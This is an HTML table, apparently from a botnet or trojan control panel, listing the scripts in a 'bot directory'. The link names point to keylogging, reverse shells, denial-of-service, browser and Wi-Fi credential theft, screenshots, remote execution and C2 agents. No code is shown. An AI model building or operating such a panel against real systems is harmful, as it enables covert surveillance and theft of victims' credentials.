<app-menu></app-menu>
<table>

  <thead>
    <tr>
      <th>FILES IN BOT DIRECTORY</th>


    </tr>
  </thead>



  <tr>
    <td> <a href=INDEXI>INDEXI</a><br></td>
  </tr>




<tr>
  <td> <a href=WifiLaunched>WifiLaunched</a><br></td>
</tr>




<tr>
  <td> <a href=change-server>change.php</a><br></td>
</tr>




<tr>
  <td> <a href=cm.php>cm.php</a><br></td>
</tr>




<tr>
  <td> <a href=launch-commands>commands.php</a><br></td>
</tr>



<tr>
  <td> <a href=del.php>del.php</a><br></td>
</tr>




<tr>
  <td> <a href=delindexi.php>delindexi.php</a><br></td>
</tr>




<tr>
  <td> <a href=delinject.php>delinject.php</a><br></td>
</tr>





<tr>
  <td> <a href=delmagic.php>delmagic.php</a><br></td>
</tr>





<tr>
  <td> <a href=delvalak.php>delvalak.php</a><br></td>
</tr>





<tr>
  <td> <a href=remove-trojan>delvalaki.php</a><br></td>
</tr>





<tr>
  <td> <a href=dos.php>dos.php</a><br></td>
</tr>





<tr>
  <td> <a href=dos-attack>dosi.php</a><br></td>
</tr>





<tr>
  <td> <a href=dw.php>dw.php</a><br></td>
</tr>





<tr>
  <td> <a href=auto-execute>execute.php</a><br></td>
</tr>




<tr>
  <td> <a href=get-files>get.php</a><br></td>
</tr>




<tr>
  <td> <a href=ima.php>ima.php</a><br></td>
</tr>




<tr>
  <td> <a href=index.php>index.php</a><br></td>
</tr>




<tr>
  <td> <a href=index0.php>index0.php</a><br></td>
</tr>




<tr>
  <td> <a href=info.php>info.php</a><br></td>
</tr>




<tr>
  <td> <a href=juden.php>juden.php</a><br></td>
</tr>





<tr>
  <td> <a href=execute-keylogger>key.php</a><br></td>
</tr>





<tr>
  <td> <a href=killlogger.php>killlogger.php</a><br></td>
</tr>





<tr>
  <td> <a href=listar.php>listar.php</a><br></td>
</tr>




<tr>
  <td> <a href=logger.php>logger.php</a><br></td>
</tr>





<tr>
  <td> <a href=logout.php>logout.php</a><br></td>
</tr>




<tr>
  <td> <a href=c2-agents>memoryc2.php</a><br></td>
</tr>




<tr>
  <td> <a href=meterc2.php>meterc2.php</a><br></td>
</tr>




<tr>
  <td> <a href=put-files>put.php</a><br></td>
</tr>




<tr>
  <td> <a href=remove-command>remove.php</a><br></td>
</tr>




<tr>
 <td> <a href=rs.php>rs.php</a><br></td>
</tr>




<tr>
  <td> <a href=reverse-shell>rshell.php</a><br></td>
</tr>




<tr>
  <td> <a href=rstandar.php>rstandar.php</a><br></td>
</tr>





<tr>
  <td> <a href=screen.php>screen.php</a><br></td>
</tr>




<tr>
  <td> <a href=screen-shots>screeni.php</a><br></td>
</tr>




<tr>
  <td> <a href=stc2.php>stc2.php</a><br></td>
</tr>



<tr>
  <td> <a href=treeinfo.php>treeinfo.php</a><br></td>
</tr>




<tr>
  <td> <a href=up.php>up.php</a><br></td>
</tr>





<tr>
  <td> <a href=uplogger.php>uplogger.php</a><br></td>
</tr>



<tr>
  <td> <a href=vault.php>vault.php</a><br></td>
</tr>




<tr>
  <td> <a href=get-credentials>web.php</a><br></td>
</tr>



<tr>
  <td> <a href=webcrechrome.php>webcrechrome.php</a><br></td>
</tr>




<tr>
  <td> <a href=webcrefirefox.php>webcrefirefox.php</a><br></td>
</tr>




<tr>
  <td> <a href=webcreiedge.php>webcreiedge.php</a><br></td>
</tr>



<tr>
  <td> <a href=webcreopera.php>webcreopera.php</a><br></td>
</tr>





<tr>
  <td> <a href=wif.php>wif.php</a><br></td>
</tr>





<tr>
  <td> <a href=get-wifi>wifi.php</a><br></td>
</tr>

</table>


